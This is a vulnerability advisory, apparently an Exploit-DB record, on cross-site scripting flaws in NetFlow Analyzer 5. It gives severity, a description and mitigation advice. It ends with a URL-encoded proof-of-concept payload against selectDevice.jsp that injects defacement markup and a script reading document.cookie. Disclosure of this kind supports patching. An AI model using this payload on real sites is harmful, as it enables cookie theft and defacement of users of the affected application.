Multiple Cross-Site Scripting Vulnerabilities in NetFlow Analyzer

vendor:

NetFlow Analyzer

by:

7.5

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: NetFlow Analyzer

Affected Version From: 5

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in NetFlow Analyzer

NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application. Avoid displaying user-supplied input without proper encoding or validation.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24766/info
   
NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
   
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
   
This issue affects NetFlow Analyzer 5; other versions may also be affected.

 http://www.example.com/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E